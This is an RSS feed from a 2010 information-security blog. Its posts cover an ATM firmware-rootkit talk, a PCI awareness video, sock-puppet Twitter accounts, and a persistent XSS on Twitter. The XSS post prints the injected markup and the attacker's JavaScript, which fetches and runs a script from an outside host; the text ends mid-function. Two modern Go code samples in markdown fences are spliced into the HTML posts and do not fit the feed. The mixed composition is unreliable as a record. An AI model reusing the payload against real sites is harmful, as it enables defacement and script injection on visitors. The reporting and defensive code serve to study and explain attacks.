<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Praetorian Prefect &#187; Prefect</title>
	<atom:link href="http://praetorianprefect.com/archives/author/prefect/feed/" rel="self" type="application/rss+xml" />
	<link>http://praetorianprefect.com</link>
	<description>Information security, a little slower...a little deeper</description>
	<lastBuildDate>Thu, 29 Jul 2010 16:38:31 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Turning an ATM into a Slot Machine</title>
		<link>http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/</link>
		<comments>http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/#comments</comments>
		<pubDate>Wed, 28 Jul 2010 23:50:13 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[atm]]></category>
		<category><![CDATA[blackhat]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4600</guid>
		<description><![CDATA[In a talk originally slated for last year before it was muffled by Juniper based on the concerns of "an affected ATM vendor", Jack demonstrates what he calls jackpotting an ATM.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/07/atm_jackpot.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/07/atm_jackpot-150x150.jpg" alt="" title="atm_jackpot" width="150" height="150" class="alignleft size-thumbnail wp-image-4601" /></a></p>

<p>Security researcher Barnaby Jack, currently at IOActive but a veteran of Foundstone, eEye, and Juniper with almost ten years in the industry, has demonstrated two exploit methods for ATMs (Automated Teller Machines) in a presentation that is thus far the talk of the Black Hat 2010 conference. In a discussion originally slated for last year before it was muffled by Juniper based on the concerns of &#8220;an affected ATM vendor&#8221;, Jack demonstrates what he calls jackpotting an ATM.</p>

<p>Here&#8217;s the ATM &#8220;jackpot&#8221; (music playing, money flying out, word &#8216;Jackpot&#8217; displayed on the console):</p>

<p><object width="425" height="344"><param name="movie" value="http://www.twitvid.com/player/TGMDW"></param><param name="allowscriptaccess" value="always"></param><param name="allowFullScreen" value="true"></param><embed type="application/x-shockwave-flash" src="http://www.twitvid.com/player/TGMDW" quality="high" allowscriptaccess="always" allowNetworking="all" allowfullscreen="true" wmode="transparent" height="344" width="425"></object>
<br /></p>

<h3>The Attack</h3>

<p>The attack was employed using two custom tools Jack developed: Scrooge, an ATM firmware rootkit (malicious software that conceals itself at the firmware layer, the interface between software and hardware) and Dillinger (named for the famous bank robber), a remote ATM attack tool that keeps track of compromised machines and stores the data stolen from people who use the machines. The first exploit involved unlocking a panel on the ATM and inserting a USB key that overwrites the machine&#8217;s native firmware with the aforementioned rootkit, taking control of the ATM.</p>

<h3>Research</h3>

<p><div id="attachment_4606" class="wp-caption alignleft" style="width: 200px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/07/atm_open.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/07/atm_open.jpg" alt="" title="atm_open" width="190" height="202" class="size-full wp-image-4606" /></a><p class="wp-caption-text">Triton ATM opened up, as an example.</p></div>
<br /></p>

<p>To perform the research, Jack acquired physical ATMs, attached a debugger to the ATM motherboard, and proceeded to reverse engineer the machine&#8217;s firmware. He then developed a replacement version (the aforementioned Scrooge software). Firmware typically refers to the small footprint of code (programs, data structures) that provides internal control of an electronic device; in other words, think of the low-level operations of any electronic device.</p>

<p>In the models Jack tested, after opening the cabinet with a master key purchased online to reach the machine&#8217;s USB ports, he was able to replace the firmware with his rootkit version. The ATMs include this capability so that those performing maintenance on the ATM can apply firmware updates. However, there is no integrity check to ensure that the code update is coming from a trusted source.</p>

<p>The keys themselves for the cabinets are <a href="http://www.atmpartmart.com/index.php?main_page=index&amp;cPath=698_833_847">not hard to acquire</a>.</p>

<h3>Mitigation</h3>

<p>In response ATM vendors have created a new version of the firmware requiring that future updates carry a digital signature (essentially a shared secret between the machine and the author of code for that machine to ensure the integrity of the code update). Doing this would help to prevent the type of rogue update via USB that Jack performed, as long as the signing keys are kept secret.</p>
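<p>The signed-update check that the vendors&#8217; new firmware adds can be sketched as follows. This is an added example written for this post, not vendor code and not any real ATM update format: the container layout is constructed, it uses an Ed25519 public-key signature (so the machine stores only the vendor&#8217;s public key and holds no secret), and it also refuses rollback to an older version.</p>

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Constructed update container (hypothetical, not a vendor format):
//   magic "FWUP" (4) | version (4, big-endian) | payload length (4) | payload | Ed25519 signature (64)
// The signature covers every byte before it.
var fwMagic = []byte("FWUP")

const (
	fwHeaderLen = 12
	fwSigLen    = ed25519.SignatureSize
)

// BuildUpdate serialises and signs an image with the vendor's private key.
// Only the vendor's signing system holds priv; the ATM carries just the public key.
func BuildUpdate(priv ed25519.PrivateKey, version uint32, payload []byte) []byte {
	var buf bytes.Buffer
	buf.Write(fwMagic)
	binary.Write(&buf, binary.BigEndian, version)
	binary.Write(&buf, binary.BigEndian, uint32(len(payload)))
	buf.Write(payload)
	buf.Write(ed25519.Sign(priv, buf.Bytes()))
	return buf.Bytes()
}

// VerifyUpdate is the check the USB update path lacked: it accepts an image only if
// it is well formed, carries a valid vendor signature, and is newer than what is
// installed. It returns the payload that may be flashed.
func VerifyUpdate(pub ed25519.PublicKey, installedVersion uint32, image []byte) ([]byte, error) {
	if len(image) < fwHeaderLen+fwSigLen {
		return nil, errors.New("image too short")
	}
	if !bytes.Equal(image[:4], fwMagic) {
		return nil, errors.New("bad magic")
	}
	version := binary.BigEndian.Uint32(image[4:8])
	plen := uint64(binary.BigEndian.Uint32(image[8:12]))
	if uint64(fwHeaderLen)+plen+fwSigLen != uint64(len(image)) {
		return nil, errors.New("length field does not match image size")
	}
	end := fwHeaderLen + int(plen)
	// Verify the signature before trusting the version or the payload.
	if !ed25519.Verify(pub, image[:end], image[end:]) {
		return nil, errors.New("signature check failed: not a vendor-signed update")
	}
	if version <= installedVersion {
		return nil, fmt.Errorf("rollback refused: image version %d, installed %d", version, installedVersion)
	}
	return image[fwHeaderLen:end], nil
}

// Demo runs four constructed cases against a freshly generated vendor key and
// reports whether each produced the expected decision.
func Demo() map[string]bool {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	_, attackerPriv, _ := ed25519.GenerateKey(rand.Reader)
	const installed = 7
	payload := []byte("constructed firmware payload v8")

	genuine := BuildUpdate(vendorPriv, 8, payload)
	_, errGenuine := VerifyUpdate(vendorPub, installed, genuine)

	// A signed image with one payload byte altered after signing.
	tampered := append([]byte(nil), genuine...)
	tampered[fwHeaderLen] ^= 0xff
	_, errTampered := VerifyUpdate(vendorPub, installed, tampered)

	// An image signed with a key the machine does not trust.
	rogue := BuildUpdate(attackerPriv, 9, []byte("not vendor firmware"))
	_, errRogue := VerifyUpdate(vendorPub, installed, rogue)

	// Properly signed, but older than what is currently running.
	old := BuildUpdate(vendorPriv, 6, payload)
	_, errOld := VerifyUpdate(vendorPub, installed, old)

	return map[string]bool{
		"genuine accepted":  errGenuine == nil,
		"tampered rejected": errTampered != nil,
		"rogue rejected":    errRogue != nil,
		"rollback rejected": errOld != nil,
	}
}

func main() {
	for name, ok := range Demo() {
		fmt.Printf("%-18s %v\n", name, ok)
	}
}
```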

<h3>Breadth</h3>

<p>While Jack wouldn&#8217;t reveal the names of the ATM vendors whose devices he compromised (they are reported to be Triton and Tranax machines), he has noted that every ATM he has tested he has compromised, suggesting that attacks on multiple machines are possible because of similarities in the way generic ATMs are made. He did note the external limitations of his research, citing the fact that there are only so many ATMs you can put in an apartment before &#8220;your girlfriend gets mad&#8221;.</p>

<p>Jack actually told the delivery man who brought the ATMs that he was getting them because he wanted to avoid bank withdrawal fees.</p>

<p><div id="attachment_4602" class="wp-caption alignnone" style="width: 622px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/07/atm_jackpot1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/07/atm_jackpot1.jpg" alt="" title="atm_jackpot" width="612" height="828" class="size-full wp-image-4602" /></a><p class="wp-caption-text">Money spews from the ATM like a slot machine post exploit.</p></div>
<br /></p>

<h3>Remote Attack</h3>

<p>A remote attack was also demonstrated over Wifi, but many of the details have not yet been released. Jack found a way, testing on his own machines, to bypass the remote authentication system of the ATM so that the same homemade rootkit, Scrooge, could be installed. This essentially provides access to an ATM via an Internet connection, allowing for attack results such as recording card and PIN numbers on entry and sending them to a remote attacker. Such vulnerable ATMs could be located with a war dialing tool, calling thousands of phone numbers until a vulnerable machine responds via modem, a technique already in play by criminals.</p>

<h3>Conclusion</h3>

<blockquote>
  <p>&#8220;Sometimes you have to demo a threat to spark a solution,&#8221; <br />Barnaby Jack</p>
</blockquote>

<p>The image is a resonant and powerful one of insecurity: we have here a demonstrated attack that allows you to spew money out of an ATM in a few seconds, and a second that doesn&#8217;t even require physical access to the machine. At this point, the response time frame from ATM vendors, as well as the vulnerability demonstrated via USB, borders on negligence: a master key that is readily available and USB-based firmware updates without any signing mechanism to ensure that an update is an &#8216;approved&#8217; one.</p>

<p>We have here, after all, a device whose sole purpose is to dispense cash.</p>

<p>Last year an ATM vendor got the talk pulled from BlackHat by pressuring Jack&#8217;s employer, Juniper Networks, despite having seven months of notification from Jack to arrive at some sort of response before the scheduled talk. Given we are now some one and a half years from notification, and given the quantity and dispersal of ATMs out there, the vulnerabilities demonstrated are likely still viable.</p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>PCI Rock, WTH?</title>
		<link>http://praetorianprefect.com/archives/2010/07/pci-rock-wth/</link>
		<comments>http://praetorianprefect.com/archives/2010/07/pci-rock-wth/#comments</comments>
		<pubDate>Fri, 23 Jul 2010 19:10:08 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Certification]]></category>
		<category><![CDATA[pci]]></category>
		<category><![CDATA[WTF]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4589</guid>
		<description><![CDATA[Security Awareness Programs can be a daunting task. It is not atypical to try to mix security awareness programs with some element of fun, such as humor with a message.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/07/pci_logo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/07/pci_logo.jpg" alt="" title="pci_logo" width="117" height="83" class="alignleft size-full wp-image-4596" /></a></p>

<p>Security Awareness Programs can be a daunting task. It is not atypical to try to mix security awareness programs with some element of fun, such as humor with a message. After all, playing off fear has a limited shelf life, may not be your personal style, and may alienate the audience. That said, good humor is, well&#8230;hard, and you risk being hokey to the point where your message, and even you, may not be taken seriously.</p>

<p>Enter the PCI Security Standards Council&#8217;s horrible country song:</p>

<p><object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/OceYWri86Ts&amp;hl=en_US&amp;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/OceYWri86Ts&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object>
<br /></p>

<p>The song has already been nominated for a <a href="http://pwnies.com/">Pwnie 2010 award</a>.</p>

<p><div id="attachment_4592" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/07/pci_rocks.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/07/pci_rocks.jpg" alt="" title="pci_rocks" width="750" height="565" class="size-full wp-image-4592" /></a><p class="wp-caption-text">PCI Standards Rock?</p></div>
<br />
<div id="attachment_4593" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/07/PCI_QSA_Fees.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/07/PCI_QSA_Fees.jpg" alt="" title="PCI_QSA_Fees" width="750" height="383" class="size-full wp-image-4593" /></a><p class="wp-caption-text">Qualification Fees - PCI QSA</p></div>
<br /></p>

<p>A Twitter response captured the problem with this approach succinctly: &#8220;That particular page isn&#8217;t going to help their mission &#8211; looking like a dope trying to reach people who think you&#8217;re a dope&#8221; &#8211; <a href="http://www.twitter.com/Corum">@Corum</a>.</p>

<p>At least the Standards Council is spending the exorbitant qualification fees it collects wisely.</p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/07/pci-rock-wth/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Asian Men Prefer LIGATT</title>
		<link>http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/#comments</comments>
		<pubDate>Wed, 30 Jun 2010 23:29:07 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Industry News]]></category>
		<category><![CDATA[charlatans]]></category>
		<category><![CDATA[ligatt]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4478</guid>
		<description><![CDATA[A number of new Twitter accounts spawned today, all tweeting positively about the disgraced security firm LIGATT security (plagiarism, threats, stock manipulation), responding to actual security professionals, and all using avatars that are easily attributable to other web sites.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bowie.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bowie.jpg" alt="" title="bowie" width="131" height="88" class="alignleft size-full wp-image-4479" /></a></p>

<p>A number of new Twitter accounts spawned today, all tweeting positively about the disgraced security firm LIGATT security (<a href="http://praetorianprefect.com/archives/2010/06/4305/">plagiarism</a>, <a href="http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/">threats</a>, <a href="http://attrition.org/errata/charlatan/gregory_evans/ligatt01/">stock manipulation</a>), responding to actual security professionals, and using avatars that are attributable to other sources. On one, the account creator actually forgot to remove the &#8220;Stock&#8221; message from the photo. In another, an image was taken of famous baseball player Ichiro Suzuki to create a fake account titled &#8220;Khang&#8221;. This technique is instructive in how not to attempt to restore one&#8217;s reputation on Twitter, and provides a look at a security company awkwardly creating Twitter Spam as part of its marketing.</p>

<h3>Bowie Khung</h3>

<p><div id="attachment_4488" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bowie_khung1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bowie_khung1.jpg" alt="" title="bowie_khung" width="750" height="715" class="size-full wp-image-4488" /></a><p class="wp-caption-text">Bowie Stock Photo Khung</p></div>
<br /></p>

<p><div id="attachment_4487" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/bowie_gettyimages.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/bowie_gettyimages.jpg" alt="" title="bowie_gettyimages" width="750" height="504" class="size-full wp-image-4487" /></a><p class="wp-caption-text">Getty Images: Asian Man Smiling</p></div>
<br /></p>

<h3>Khang (aka Ichiro Suzuki, Seattle Mariners baseball team)</h3>

<p><div id="attachment_4493" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/Khang.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/Khang.jpg" alt="" title="Khang" width="750" height="514" class="size-full wp-image-4493" /></a><p class="wp-caption-text">Hits leadoff for the Mariners, and tracks LIGATT.</p></div>
<br /></p>

<p><div id="attachment_4486" class="wp-caption alignnone" style="width: 689px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ichiro.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ichiro.jpg" alt="" title="ichiro" width="679" height="726" class="size-full wp-image-4486" /></a><p class="wp-caption-text">Khang plays baseball, and loves LIGATT.</p></div>
<br /></p>

<h3>Nemanja</h3>

<p><div id="attachment_4483" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/nem_rodo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/nem_rodo.jpg" alt="" title="nem_rodo" width="750" height="682" class="size-full wp-image-4483" /></a><p class="wp-caption-text">Nemanja</p></div>
<br /></p>

<p><div id="attachment_4484" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/nemanja_result.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/nemanja_result.jpg" alt="" title="nemanja_result" width="700" height="386" class="size-full wp-image-4484" /></a><p class="wp-caption-text">Where Nemanja's image was taken from.</p></div>
<br /></p>

<h3>And the Lameness Continues&#8230;</h3>

<p><div id="attachment_4495" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/josh_p82.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/josh_p82.jpg" alt="" title="josh_p82" width="750" height="636" class="size-full wp-image-4495" /></a><p class="wp-caption-text">Hey, SPOOFEM works great.</p></div>
<br /></p>

<p><div id="attachment_4497" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/dhen.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/dhen.jpg" alt="" title="dhen" width="750" height="660" class="size-full wp-image-4497" /></a><p class="wp-caption-text">I wish I was in Vuvuzela?</p></div>
<br /></p>

<p><div id="attachment_4496" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/joewang.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/joewang.jpg" alt="" title="joewang" width="750" height="477" class="size-full wp-image-4496" /></a><p class="wp-caption-text">Big Joe Wang</p></div>
<br /></p>

<p><div id="attachment_4498" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/rico.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/rico.jpg" alt="" title="rico" width="750" height="624" class="size-full wp-image-4498" /></a><p class="wp-caption-text">Why does he like the name Rico so much?</p></div>
<br /></p>

<h3>Finally</h3>

<p>We thought we were done writing about LIGATT, we really did. But the buffoonery seems to know no bounds.</p>

<p>&#8220;Just when I thought I was out, they pull me back in.&#8221;</p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Persistent XSS on Twitter.com</title>
		<link>http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/#comments</comments>
		<pubDate>Thu, 24 Jun 2010 08:32:11 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4423</guid>
		<description><![CDATA[Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability he found on  June 21st using his own Twitter account (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/failwhale.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/failwhale-e1277366677897-150x150.jpg" alt="" title="failwhale" width="150" height="150" class="alignleft size-thumbnail wp-image-4424" /></a></p>

<p>Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability on Twitter he found on June 21st using <a href="http://twitter.com/0wn3d_5ys">his own Twitter account</a> (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications. Visiting his account on Twitter results in a pair of classic cross site scripting alert boxes; then your browser window is manipulated, you enter the matrix (see below), and finally you get messages from the researcher who found the vulnerability.</p>

<p><div id="attachment_4428" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/xss_example.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/xss_example.jpg" alt="" title="xss_example" width="750" height="600" class="size-full wp-image-4428" /></a><p class="wp-caption-text">Initial result of visiting the affected Twitter profile.</p></div>
<br /></p>

<p><div id="attachment_4429" class="wp-caption alignnone" style="width: 336px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/alert1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/alert1.jpg" alt="" title="alert1" width="326" height="126" class="size-full wp-image-4429" /></a><p class="wp-caption-text">Alert box one.</p></div>
<br /></p>

<p><div id="attachment_4430" class="wp-caption alignnone" style="width: 428px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/alert2.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/alert2.jpg" alt="" title="alert2" width="418" height="126" class="size-full wp-image-4430" /></a><p class="wp-caption-text">Alert box 2.</p></div>
<br /></p>

<p><div id="attachment_4431" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/matrix_time.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/matrix_time.jpg" alt="" title="matrix_time" width="750" height="600" class="size-full wp-image-4431" /></a><p class="wp-caption-text">Then you're in the matrix.</p></div>
<br /></p>

<p>And lest you wonder at his intentions, he supplies the following messages into the page&#8217;s title tag:</p>

<pre><code>tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: Indonesian H4x0r";
</code></pre>

<p>He announced the find <a href="http://www.0wn3d-5ys.co.cc/">on his blog</a> as well as the Indonesian forum Balikita.</p>

<h3>The Vulnerable Field</h3>

<p>The problem is similar to one <a href="http://www.davidnaylor.co.uk/massive-twitter-cross-site-scripting-vulnerability.html">described last August</a> by James Slater. That time around the issue was with the application URL, this time it appears the application name is the issue.</p>

<p>The code containing the injection occurs at the application name field (the &#8220;via Application name&#8221; text you see on your tweets).</p>

<pre><code>&lt;span&gt;via &lt;a href="http://www.0wn3d-5ys.co.cc" rel="nofollow"&gt;Ub­­&amp;shy;erTw­i­&amp;shy;tter&lt;span 
style="visibility: hidden"&amp;gt; &lt;script src='http://is.gd/cWO66' type='text/javascript'&amp;gt;&lt;/script&amp;gt;&lt;/a&gt;
&lt;/span&gt;
</code></pre>

<p>What do you notice right away? There&#8217;s no closing bracket on the closing script tag (Twitter is encoding the closing angle brackets of what was submitted as gt, at least partially). Here the researcher seems to get lucky in that his closing script tag is ignored, and the page falls all the way through to another Javascript include before it starts interpreting the markup again. Fortunately for him, the next thing the browser interprets is the closing script tag on a Twitter-included Javascript, thus the code injection works:</p>

<pre><code>&lt;script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"&gt;&lt;/script&gt;
</code></pre>

<p><div id="attachment_4433" class="wp-caption alignnone" style="width: 389px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/injection_location.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/injection_location.jpg" alt="" title="injection_location" width="379" height="251" class="size-full wp-image-4433" /></a><p class="wp-caption-text">Injection location.</p></div>
<br /></p>

<p>This field is supplied when an application is set up via the Twitter <a href="http://dev.twitter.com/apps/new">Application Registration</a> page.</p>
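<p>The two controls this post points at, input validation of the application name at registration and consistent output encoding when it is rendered into the &#8220;via&#8221; span, as an added example that is not Twitter&#8217;s code: the partial encoder mirrors what the captured markup shows (only the closing angle brackets turned into &amp;gt;), beside full HTML escaping and an allowlist validator. The application name and script URL are constructed placeholders, not the values from the injection.</p>

```go
package main

import (
	"errors"
	"fmt"
	"html"
	"regexp"
	"strings"
)

// Constructed application name shaped like the one in the post: the "<" characters
// are raw, and the ">" characters are what the partial encoder turns into &gt;.
// The script URL is a placeholder (example.invalid), not the one from the injection.
const sampleAppName = `UberTwitter<span style="visibility: hidden"> <script src='http://example.invalid/x.js' type='text/javascript'></script>`

// Placeholder for the application URL field.
const sampleAppURL = "http://example.invalid/"

// partialEncode reproduces the behaviour visible in the captured markup: only ">"
// becomes an entity, so "<script" is still emitted as the start of a tag.
func partialEncode(s string) string {
	return strings.ReplaceAll(s, ">", "&gt;")
}

// renderVia builds the "via <application>" span with the given output encoder.
func renderVia(appName, appURL string, encode func(string) string) string {
	return fmt.Sprintf(`<span>via <a href="%s" rel="nofollow">%s</a></span>`,
		encode(appURL), encode(appName))
}

// RenderViaPartial is the vulnerable rendering. RenderViaSafe escapes all five
// HTML-significant characters (& < > " ') so the name is inert in text and
// double-quoted attribute contexts.
func RenderViaPartial(appName string) string { return renderVia(appName, sampleAppURL, partialEncode) }
func RenderViaSafe(appName string) string    { return renderVia(appName, sampleAppURL, html.EscapeString) }

// OpensTag reports whether the rendered markup still contains a raw start tag
// for the given element name, i.e. whether the encoder failed for that input.
func OpensTag(markup, element string) bool {
	return strings.Contains(strings.ToLower(markup), "<"+strings.ToLower(element))
}

// Input-side control, separate from output encoding: an application name is a
// display label, so an allowlist of characters is defensible at registration time.
var appNameRe = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9 ._-]{0,31}$`)

// ValidateAppName rejects names containing anything outside the allowlist.
func ValidateAppName(name string) error {
	if !appNameRe.MatchString(name) {
		return errors.New("application name: letters, digits, space, '.', '_' and '-' only; 1-32 characters")
	}
	return nil
}

func main() {
	fmt.Println("partial:", RenderViaPartial(sampleAppName))
	fmt.Println("safe:   ", RenderViaSafe(sampleAppName))
	fmt.Println("partial encoding opens <script>?", OpensTag(RenderViaPartial(sampleAppName), "script"))
	fmt.Println("full escaping opens <script>?   ", OpensTag(RenderViaSafe(sampleAppName), "script"))
	fmt.Println("validate sample name:", ValidateAppName(sampleAppName))
	fmt.Println("validate plain name: ", ValidateAppName("UberTwitter"))
}
```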

<p><div id="attachment_4451" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/appform.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/appform.jpg" alt="" title="appform" width="700" height="711" class="size-full wp-image-4451" /></a><p class="wp-caption-text">Where Application Name is supplied.</p></div>
<br /></p>

<h3>The Javascript</h3>

<p>The shortened URL included (http://is.gd/cWO66) redirects to: http://h1.ripway.com/www.Frendster.com/011.js.</p>

<pre><code>//*----------------------------------*//
alert("::::::||+ &lt;/X55ED&gt; + H4x0r-x0x  +||:::::: ");
alert("::::::::::::::::||+ Page Twitter Owned By: H4x0r-x0x +||:::::::::::::::: \n ::::::||+ H4x0r-x0x From Forum.Balikita.Net &amp; Ungu.com +||::::::");

//*----------------------------------*//
var myjs = document.createElement("script");
myjs.type = "text/javascript";
myjs.src = "http://h1.ripway.com/www.Frendster.com/H4x0r.js";
document.getElementsByTagName("head")[0].appendChild(myjs);

//*----------------------------------*//
var shortc = document.createElement("link");
shortc.rel = "SHORTCUT ICON";
shortc.href = "http://img532.imageshack.us/img532/4308/indonesiaflag.gif";
document.getElementsByTagName("head")[0].appendChild(shortc);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","http://h1.ripway.com/www.Frendster.com/twitt.css");
document.getElementsByTagName("head")[0].appendChild(css);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href"," http://h1.ripway.com/www.Frendster.com/css.css");
document.getElementsByTagName("head")[0].appendChild(css);

//**************************************//

//**************************************//

function tb8_makeArray(n){
this.length = n;
return this.length;
}
tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: Indonesian H4x0r";
tb8_rptType = 'infinite';
tb8_rptNbr = 5;
tb8_speed = 100;
tb8_delay = 2000;
var tb8_counter=1;
var tb8_currMsg=0;
var tb8_tekst ="";
var tb8_i=0;
var tb8_TID = null;
function tb8_pisi(){
tb8_tekst = tb8_tekst + tb8_messages[tb8_currMsg].substring(tb8_i, tb8_i+1);
document.title = tb8_tekst;
tb8_sp=tb8_speed;
tb8_i++;
if (tb8_i==tb8_messages[tb8_currMsg].length){
tb8_currMsg++; tb8_i=0; tb8_tekst="";tb8_sp=tb8_delay;
}
if (tb8_currMsg == tb8_messages.length){
if ((tb8_rptType == 'finite') &amp;&amp; (tb8_counter==tb8_rptNbr)){
clearTimeout(tb8_TID);
return;
}
tb8_counter++;
tb8_currMsg = 0;
}
tb8_TID = setTimeout("tb8_pisi()", tb8_sp);
}
tb8_pisi()


//------

var message=" syapakahh Qwueee.. w4s Hare ";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&amp;&amp;!document.all)) {
